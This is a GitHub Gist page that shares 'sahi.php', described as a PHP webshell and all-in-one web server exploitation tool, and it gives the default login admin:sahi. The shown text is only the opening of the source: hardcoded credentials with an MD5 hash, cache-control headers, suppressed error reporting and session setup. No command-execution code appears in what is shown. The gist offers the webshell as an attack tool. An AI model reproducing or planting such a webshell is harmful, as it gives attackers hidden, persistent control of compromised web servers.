Skip to content

Instantly share code, notes, and snippets.

@nollium
nollium / sahi.php
Created January 1, 2024 22:28 — forked from zsahi/sahi.php
sahi.php is php webshell, which is all in one web server penetration testing and exploitation tool. Credentials are admin:sahi
<?php
$u = "admin";
$p = "61134b3a07ea8bee089d0ae8e60ad552"; //sahi
header("Pragma: no-cache");
header("Cache-Control: no-store");
error_reporting(0);
session_start();
if (@get_magic_quotes_gpc()) {
function stripslashes_deep($value){